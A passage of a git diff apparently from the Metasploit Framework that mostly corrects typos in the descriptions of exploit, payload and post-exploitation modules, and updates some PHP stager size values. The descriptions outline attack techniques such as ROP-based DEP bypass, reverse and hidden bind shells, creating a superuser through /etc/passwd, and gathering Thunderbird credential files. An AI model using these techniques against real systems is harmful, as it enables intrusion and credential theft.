 command. Additionally the filename option in the same command can be used to launch a directory traversal attack and achieve arbitrary file upload.
- The module uses uses the Windows Management Instrumentation service to execute an
+ The module uses the Windows Management Instrumentation service to execute an
 arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003 SP2.
diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb
index 4207c36860..835342afca 100644
--- a/modules/exploits/windows/misc/fb_cnct_group.rb
+++ b/modules/exploits/windows/misc/fb_cnct_group.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
 This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. A two-phases
- stackpivot allows to execute the ROP chain which ultimately is used to execute
+ stack pivot allows to execute the ROP chain which ultimately is used to execute
 VirtualAlloc and bypass DEP. }, 'Author' => 'Spencer McIntyre',
diff --git a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb
index 2bab2f7f54..a5accdcda6 100644
--- a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb
@@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'HP Data Protector 8.10 Remote Command Execution', 'Description' => %q{ This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary
- commands can be execute by sending crafted requests with opcode 28 to the OmniInet
- service listening on the TCP/5555 port. Since there is an strict length limitation on
+ commands can be executed by sending crafted requests with opcode 28 to the OmniInet
+ service listening on the TCP/5555 port. Since there is a strict length limitation on
 the command, rundll32.exe is executed, and the payload is provided through a DLL by a fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on Windows 7 SP1.
diff --git a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb
index 49af5167d8..6b0fedbc0d 100644
--- a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info, 'Name' => 'HP Data Protector 6.10/6.11/6.20 Install Service', 'Description' => %q{
- This module exploits HP Data Protector Omniinet process on Windows only.
+ This module exploits HP Data Protector OmniInet process on Windows only.
 This exploit invokes the install service function which allows an attacker to create a custom payload in the format of an executable.
diff --git a/modules/exploits/windows/misc/hp_omniinet_3.rb b/modules/exploits/windows/misc/hp_omniinet_3.rb
index e15d95d86d..109d5a403a 100644
--- a/modules/exploits/windows/misc/hp_omniinet_3.rb
+++ b/modules/exploits/windows/misc/hp_omniinet_3.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info, 'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow', 'Description' => %q{
- This module exploits a buffer overflow in the Hewlett-Packard
+ This module exploits a buffer overflow in the Hewlett-Packard
 OmniInet NT Service. By sending a specially crafted opcode 27 packet, a remote attacker may be able to execute arbitrary code. },
diff --git a/modules/exploits/windows/misc/mini_stream.rb b/modules/exploits/windows/misc/mini_stream.rb
index 0a9834f53b..301d921fc3 100644
--- a/modules/exploits/windows/misc/mini_stream.rb
+++ b/modules/exploits/windows/misc/mini_stream.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1
- By creating a specially crafted pls file, an an attacker may be able
+ By creating a specially crafted pls file, an attacker may be able
 to execute arbitrary code. }, 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/misc/splayer_content_type.rb b/modules/exploits/windows/misc/splayer_content_type.rb
index 8972d07b35..18803748be 100644
--- a/modules/exploits/windows/misc/splayer_content_type.rb
+++ b/modules/exploits/windows/misc/splayer_content_type.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info, 'Name' => "SPlayer 3.7 Content-Type Buffer Overflow", 'Description' => %q{
- This module exploits a vulnerability in SPlayer v3.7 or piror. When SPlayer
+ This module exploits a vulnerability in SPlayer v3.7 or prior. When SPlayer
 requests the URL of a media file (video or audio), it is possible to gain arbitrary remote code execution due to a buffer overflow caused by an exceeding length of data as the 'Content-Type' parameter.
diff --git a/modules/exploits/windows/misc/stream_down_bof.rb b/modules/exploits/windows/misc/stream_down_bof.rb
index 4183d0abb6..04a6a2f070 100644
--- a/modules/exploits/windows/misc/stream_down_bof.rb
+++ b/modules/exploits/windows/misc/stream_down_bof.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'CoCSoft StreamDown 6.8.0 Buffer Overflow', 'Description' => %q{ Stream Down 6.8.0 seh based buffer overflow triggered when processing
- the server reponse packet.During the overflow a structured exception
+ the server response packet. During the overflow a structured exception
 handler is overwritten. }, 'Author' => 'Fady Mohamed Osman ',
diff --git a/modules/exploits/windows/misc/windows_rsh.rb b/modules/exploits/windows/misc/windows_rsh.rb
index 8e0b046f6e..e98c90f778 100644
--- a/modules/exploits/windows/misc/windows_rsh.rb
+++ b/modules/exploits/windows/misc/windows_rsh.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info, 'Name' => 'Windows RSH Daemon Buffer Overflow', 'Description' => %q{
- This module exploits a vulnerabliltiy in Windows RSH daemon 1.8.
+ This module exploits a vulnerability in Windows RSH daemon 1.8.
 The vulnerability is due to a failure to check for the length of input sent to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit to be successful.
diff --git a/modules/exploits/windows/misc/wireshark_lua.rb b/modules/exploits/windows/misc/wireshark_lua.rb
index 2a577b4a44..7e3a0fbf07 100644
--- a/modules/exploits/windows/misc/wireshark_lua.rb
+++ b/modules/exploits/windows/misc/wireshark_lua.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info, 'Name' => "Wireshark console.lua Pre-Loading Script Execution", 'Description' => %q{
- This modules exploits a vulnerability in Wireshark 1.6 or less. When opening a
+ This module exploits a vulnerability in Wireshark 1.6 or less. When opening a
 pcap file, Wireshark will actually check if there's a 'console.lua' file in the same directory, and then parse/execute the script if found. Versions affected by this vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8
diff --git a/modules/exploits/windows/misc/wireshark_packet_dect.rb b/modules/exploits/windows/misc/wireshark_packet_dect.rb
index 7ce4a89a34..89a0351356 100644
--- a/modules/exploits/windows/misc/wireshark_packet_dect.rb
+++ b/modules/exploits/windows/misc/wireshark_packet_dect.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'Wireshark packet-dect.c Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Wireshark <= 1.4.4
- by sending an malicious packet.
+ by sending a malicious packet.
 }, 'License' => MSF_LICENSE, 'Author' =>
diff --git a/modules/exploits/windows/motorola/timbuktu_fileupload.rb b/modules/exploits/windows/motorola/timbuktu_fileupload.rb
index 00c492eef1..0de5bdcb6a 100644
--- a/modules/exploits/windows/motorola/timbuktu_fileupload.rb
+++ b/modules/exploits/windows/motorola/timbuktu_fileupload.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info, 'Name' => 'Timbuktu Pro Directory Traversal/File Upload', 'Description' => %q{
- This module exploits a directory traversal vulnerablity in Motorola's
+ This module exploits a directory traversal vulnerability in Motorola's
 Timbuktu Pro for Windows 8.6.5. }, 'Author' => [ 'MC' ],
diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb
index 45793d5786..5420a0e997 100644
--- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb
+++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
 This exploit smashes several pointers, as shown below. 1. pointer to a 32-bit value that is set to 0
- 2. pointer to a 32-bit value that is set to a length influcenced by the buffer
+ 2. pointer to a 32-bit value that is set to a length influenced by the buffer
 length. 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the
diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
index 409ef5346e..e786810528 100644
--- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
+++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
 This exploit smashes several pointers, as shown below. 1. pointer to a 32-bit value that is set to 0
- 2. pointer to a 32-bit value that is set to a length influcenced by the buffer
+ 2. pointer to a 32-bit value that is set to a length influenced by the buffer
 length. 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the
diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb
index 9fa775f868..0b019721b1 100644
--- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb
+++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
 up a exploit/multi/handler to run in the background as a job to support multiple incoming shells.
- If you are interested in deploying payloads to spefic servers this module also
+ If you are interested in deploying payloads to specific servers this module also
 supports that functionality via the "DEPLOYLIST" option. Currently, the module is capable of delivering payloads to both 32bit and 64bit
diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb
index a11b0f6b52..4bb86ac3d1 100644
--- a/modules/exploits/windows/mssql/mssql_payload.rb
+++ b/modules/exploits/windows/mssql/mssql_payload.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
 the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported. First, the original method uses Windows 'debug.com'. File size restrictions are
- avoidied by incorporating the debug bypass method presented by SecureStat at
+ avoided by incorporating the debug bypass method presented by SecureStat at
 Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems. A second method takes advantage of the Command Stager subsystem. This allows using
diff --git a/modules/exploits/windows/mssql/mssql_payload_sqli.rb b/modules/exploits/windows/mssql/mssql_payload_sqli.rb
index ba54836cb3..1715ff15b2 100644
--- a/modules/exploits/windows/mssql/mssql_payload_sqli.rb
+++ b/modules/exploits/windows/mssql/mssql_payload_sqli.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
 Currently, three delivery methods are supported. First, the original method uses Windows 'debug.com'. File size restrictions are
- avoidied by incorporating the debug bypass method presented by SecureStat at
+ avoided by incorporating the debug bypass method presented by SecureStat at
 Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems. A second method takes advantage of the Command Stager subsystem. This allows using
diff --git a/modules/exploits/windows/oracle/tns_arguments.rb b/modules/exploits/windows/oracle/tns_arguments.rb
index 081d5c44ef..15353554dc 100644
--- a/modules/exploits/windows/oracle/tns_arguments.rb
+++ b/modules/exploits/windows/oracle/tns_arguments.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Oracle 8i. When
- sending a specially crafted packet containing a overly long
+ sending a specially crafted packet containing an overly long
 ARGUMENTS string to the TNS service, an attacker may be able to execute arbitrary code. },
diff --git a/modules/exploits/windows/scada/daq_factory_bof.rb b/modules/exploits/windows/scada/daq_factory_bof.rb
index 2b1173ceed..ec883aed77 100644
--- a/modules/exploits/windows/scada/daq_factory_bof.rb
+++ b/modules/exploits/windows/scada/daq_factory_bof.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'DaqFactory HMI NETB Request Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Azeotech's DaqFactory
- product. The specfic vulnerability is triggered when sending a specially crafted
+ product. The specific vulnerability is triggered when sending a specially crafted
 'NETB' request to port 20034. Exploitation of this vulnerability may take a few seconds due to the use of egghunter. This vulnerability was one of the 14 releases discovered by researcher Luigi Auriemma.
diff --git a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb
index fce4e3a57f..cfa6ca1f24 100644
--- a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb
+++ b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Description' => %q{ This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the CIMPLICIY CimWebServer. The vulnerable component allows to execute remote BCL files in
- shared resources. An attacker can abuse this behaviour to execute a malicious BCL and
+ shared resources. An attacker can abuse this behavior to execute a malicious BCL and
 drop an arbitrary EXE. The last one can be executed remotely through the WebView server. This module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. If
diff --git a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb
index 7ad8893628..5ce73ca6c1 100644
--- a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb
+++ b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
 Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to the filesystem, by abusing the functions provided by the software.
- The module uses uses the Windows Management Instrumentation service to execute an
+ The module uses the Windows Management Instrumentation service to execute an
 arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre Vista. It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows XP SP3 and Windows 2003 SP2.
diff --git a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb
index dd1f914955..c611b2679f 100644
--- a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb
+++ b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
 SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE packet via port 910, RealWin will try to create a file (which would be saved to C:\Program Files\DATAC\Real Win\RW-version\filename) by first copying the user-
- supplied filename with a inline memcpy routine without proper bounds checking, which
+ supplied filename with an inline memcpy routine without proper bounds checking, which
 results a stack-based buffer overflow, allowing arbitrary remote code execution. Tested version: 2.0 (Build 6.1.8.10)
diff --git a/modules/exploits/windows/scada/scadapro_cmdexe.rb b/modules/exploits/windows/scada/scadapro_cmdexe.rb
index 49b8242736..7af6fc5c3c 100644
--- a/modules/exploits/windows/scada/scadapro_cmdexe.rb
+++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Measuresoft ScadaPro Remote Command Execution', 'Description' => %q{ - This module allows remote attackers to execute arbitray commands on the + This module allows remote attackers to execute arbitrary commands on the affected system by abusing via Directory Traversal attack when using the 'xf' command (execute function). An attacker can execute system() from msvcrt.dll to upload a backdoor and gain remote code execution. This diff --git a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb index bd597f7009..355b633083 100644 --- a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb +++ b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb @@ -12,9 +12,9 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow', 'Description' => %q{ - This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability + This module exploits a stack based buffer overflow on Yokogawa CS3000. The vulnerability exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create - logs using functions like vsprintf and memcpy in a insecure way. This module has been + logs using functions like vsprintf and memcpy in an insecure way. This module has been tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3. }, 'Author' => diff --git a/modules/exploits/windows/smb/generic_smb_dll_injection.rb b/modules/exploits/windows/smb/generic_smb_dll_injection.rb index 4f0bab3fdf..6a03a0623f 100644 --- a/modules/exploits/windows/smb/generic_smb_dll_injection.rb +++ b/modules/exploits/windows/smb/generic_smb_dll_injection.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Generic DLL Injection From Shared Resource', 'Description' => %q{ This is a general-purpose module for exploiting conditions where a DLL can be loaded - from an specified SMB share. This module serves payloads as DLLs over an SMB service. + from a specified SMB share. This module serves payloads as DLLs over an SMB service. }, 'Author' => [ diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb index 58121746a1..df5a44880f 100644 --- a/modules/exploits/windows/smb/ms04_007_killbill.rb +++ b/modules/exploits/windows/smb/ms04_007_killbill.rb @@ -22,14 +22,14 @@ class MetasploitModule < Msf::Exploit::Remote You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself - in 60 seconds. If the payload succeeeds, the system will no + in 60 seconds. If the payload succeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp - payloads, however a few problems were encounted when using the + payloads, however a few problems were encountered when using the equivalent bind payloads. Your mileage may vary. }, diff --git a/modules/exploits/windows/smb/ms06_070_wkssvc.rb b/modules/exploits/windows/smb/ms06_070_wkssvc.rb index 7c57f771fa..229f3f6250 100644 --- a/modules/exploits/windows/smb/ms06_070_wkssvc.rb +++ b/modules/exploits/windows/smb/ms06_070_wkssvc.rb 
@@ -17,9 +17,9 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect function using the Workstation service in Windows 2000 SP4 and Windows XP SP2. - In order to exploit this vulnerability, you must specify a the name of a + In order to exploit this vulnerability, you must specify the name of a valid Windows DOMAIN. It may be possible to satisfy this condition by using - a custom dns and ldap setup, however that method is not covered here. + a custom DNS and LDAP setup, however that method is not covered here. Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator credentials are required to reach the vulnerable code. Windows XP SP1 only diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb index 31e4970250..f5d6921f73 100644 --- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb +++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb @@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the - exploit. If the user supplies credentials in the SMBUser,SMBPass, and SMBDomain options it will use + exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or diff --git a/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb b/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb index 32b3826344..d457562c72 100644 --- a/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb +++ b/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb 
@@ -22,7 +22,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Z/OS (MVS) Command Shell, Reverse TCP', 'Description' => 'Provide JCL which creates a reverse shell - This implmentation does not include ebcdic character translation, + This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.', 'Author' => 'Bigendian Smalls', diff --git a/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb index cf22b14f24..5156e73ead 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb @@ -17,7 +17,7 @@ module MetasploitModule def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP (via ncat)', - 'Description' => 'Creates an interactive shell via ncat, utilising ssl mode', + 'Description' => 'Creates an interactive shell via ncat, utilizing ssl mode', 'Author' => 'C_Sto', 'License' => MSF_LICENSE, 'Platform' => 'unix', diff --git a/modules/payloads/singles/firefox/exec.rb b/modules/payloads/singles/firefox/exec.rb index bcfe43ccb2..002d07c520 100644 --- a/modules/payloads/singles/firefox/exec.rb +++ b/modules/payloads/singles/firefox/exec.rb @@ -14,7 +14,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Firefox XPCOM Execute Command', 'Description' => %Q| - This module runs a shell command on the target OS withough touching the disk. + This module runs a shell command on the target OS without touching the disk. On Windows, this command will flash the command prompt momentarily. This can be avoided by setting WSCRIPT to true, which drops a jscript "launcher" to disk that hides the prompt. diff --git a/modules/payloads/singles/mainframe/shell_reverse_tcp.rb b/modules/payloads/singles/mainframe/shell_reverse_tcp.rb index 2c6e7eea3a..4ed9636e28 100644 
--- a/modules/payloads/singles/mainframe/shell_reverse_tcp.rb +++ b/modules/payloads/singles/mainframe/shell_reverse_tcp.rb @@ -22,7 +22,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Z/OS (MVS) Command Shell, Reverse TCP Inline', 'Description' => 'Listen for a connection and spawn a command shell. - This implmentation does not include ebcdic character translation, + This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.', 'Author' => 'Bigendian Smalls', diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb index e8876c1069..de8c4d1e0e 100644 --- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb @@ -20,7 +20,7 @@ module MetasploitModule 'Name' => 'Windows Command Shell, Hidden Bind TCP Inline', 'Description' => 'Listen for a connection from certain IP and spawn a command shell. The shellcode will reply with a RST packet if the connections is not - comming from the IP defined in AHOST. This way the port will appear + coming from the IP defined in AHOST. This way the port will appear as "closed" helping us to hide the shellcode.', 'Author' => [ diff --git a/modules/payloads/stagers/php/bind_tcp.rb b/modules/payloads/stagers/php/bind_tcp.rb index 7afd06288c..048eff527c 100644 --- a/modules/payloads/stagers/php/bind_tcp.rb +++ b/modules/payloads/stagers/php/bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp' module MetasploitModule - CachedSize = 1188 + CachedSize = 1338 include Msf::Payload::Stager include Msf::Payload::Php::BindTcp diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6.rb b/modules/payloads/stagers/php/bind_tcp_ipv6.rb index 1c37e02e3a..ad9c422279 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6.rb 
@@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp' module MetasploitModule - CachedSize = 1187 + CachedSize = 1337 include Msf::Payload::Stager include Msf::Payload::Php::BindTcp diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb index 38f7db54b4..89f2f2ae3b 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp' module MetasploitModule - CachedSize = 1361 + CachedSize = 1511 include Msf::Payload::Stager include Msf::Payload::Php::BindTcp diff --git a/modules/payloads/stagers/php/bind_tcp_uuid.rb b/modules/payloads/stagers/php/bind_tcp_uuid.rb index 8e705c5c07..290e3b936f 100644 --- a/modules/payloads/stagers/php/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/php/bind_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp' module MetasploitModule - CachedSize = 1362 + CachedSize = 1512 include Msf::Payload::Stager include Msf::Payload::Php::BindTcp diff --git a/modules/payloads/stagers/php/reverse_tcp.rb b/modules/payloads/stagers/php/reverse_tcp.rb index a532fbaee0..3298b70837 100644 --- a/modules/payloads/stagers/php/reverse_tcp.rb +++ b/modules/payloads/stagers/php/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/reverse_tcp' module MetasploitModule - CachedSize = 966 + CachedSize = 1116 include Msf::Payload::Stager include Msf::Payload::Php::ReverseTcp diff --git a/modules/payloads/stagers/php/reverse_tcp_uuid.rb b/modules/payloads/stagers/php/reverse_tcp_uuid.rb index 6316652d79..0d2d5337ed 100644 --- a/modules/payloads/stagers/php/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/php/reverse_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/reverse_tcp' module MetasploitModule - CachedSize = 1140 + CachedSize = 1290 include Msf::Payload::Stager include Msf::Payload::Php::ReverseTcp 
diff --git a/modules/post/linux/busybox/jailbreak.rb b/modules/post/linux/busybox/jailbreak.rb index db4dcdf0ac..af48869d8c 100644 --- a/modules/post/linux/busybox/jailbreak.rb +++ b/modules/post/linux/busybox/jailbreak.rb @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Post super( 'Name' => 'BusyBox Jailbreak ', 'Description' => %q{ - This module will send a set of commands to a open session that is connected to a + This module will send a set of commands to an open session that is connected to a BusyBox limited shell (i.e. a router limited shell). It will try different known tricks to jailbreak the limited shell and get a full BusyBox shell. }, diff --git a/modules/post/linux/dos/xen_420_dos.rb b/modules/post/linux/dos/xen_420_dos.rb index 520d0daf88..0d63e6ac5b 100644 --- a/modules/post/linux/dos/xen_420_dos.rb +++ b/modules/post/linux/dos/xen_420_dos.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post 'Name' => 'Linux DoS Xen 4.2.0 2012-5525', 'Description' => %q( This module causes a hypervisor crash in Xen 4.2.0 when invoked from a - paravirtualised VM, including from dom0. Successfully tested on Debian 7 + paravirtualized VM, including from dom0. Successfully tested on Debian 7 3.2.0-4-amd64 with Xen 4.2.0.), 'References' => [ ['CVE', '2012-5525'] ], 'License' => MSF_LICENSE, diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index dcd44542ef..826aa5f99f 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb 
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings, creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these - filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within. + filenames to /etc/passwd, then sending a packet with a privileged user entry contained within. This, and all the other packets, are appended to /etc/passwd. Successful exploitation results in the creation of a new superuser account. diff --git a/modules/post/multi/gather/dns_srv_lookup.rb b/modules/post/multi/gather/dns_srv_lookup.rb index 8652558413..2a66d4a693 100644 --- a/modules/post/multi/gather/dns_srv_lookup.rb +++ b/modules/post/multi/gather/dns_srv_lookup.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Post super( update_info( info, 'Name' => 'Multi Gather DNS Service Record Lookup Scan', 'Description' => %q{ - Enumerates know SRV Records for a given domaon using target host DNS query tool. + Enumerates known SRV Records for a given domain using target host DNS query tool. }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Post register_options( [ - OptString.new('DOMAIN', [true, 'Domain ro perform SRV query against.']) + OptString.new('DOMAIN', [true, 'Domain to perform SRV query against.']) ]) end diff --git a/modules/post/multi/gather/enum_vbox.rb b/modules/post/multi/gather/enum_vbox.rb index 3f1e1ecd9e..d4208723b5 100644 --- a/modules/post/multi/gather/enum_vbox.rb +++ b/modules/post/multi/gather/enum_vbox.rb 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module will attempt to enumerate any VirtualBox VMs on the target machine. Due to the nature of VirtualBox, this module can only enumerate VMs registered - for the current user, thereforce, this module needs to be invoked from a user context. + for the current user, therefore, this module needs to be invoked from a user context. }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], diff --git a/modules/post/multi/gather/thunderbird_creds.rb b/modules/post/multi/gather/thunderbird_creds.rb index 105a618139..d42e996b47 100644 --- a/modules/post/multi/gather/thunderbird_creds.rb +++ b/modules/post/multi/gather/thunderbird_creds.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post the necessary files such as 'signons.sqlite', 'key3.db', and 'cert8.db' for offline decryption with third party tools. - If necessary, you may also set the PARSE optioin to true to parse the sqlite + If necessary, you may also set the PARSE option to true to parse the sqlite file, which contains sensitive information such as the encrypted username/password. However, this feature is not enabled by default, because it requires SQLITE3 gem to be installed on your machine. diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb index 53f2aadcdf..c19958a2ec 100644 --- a/modules/post/multi/manage/system_session.rb +++ b/modules/post/multi/manage/system_session.rb 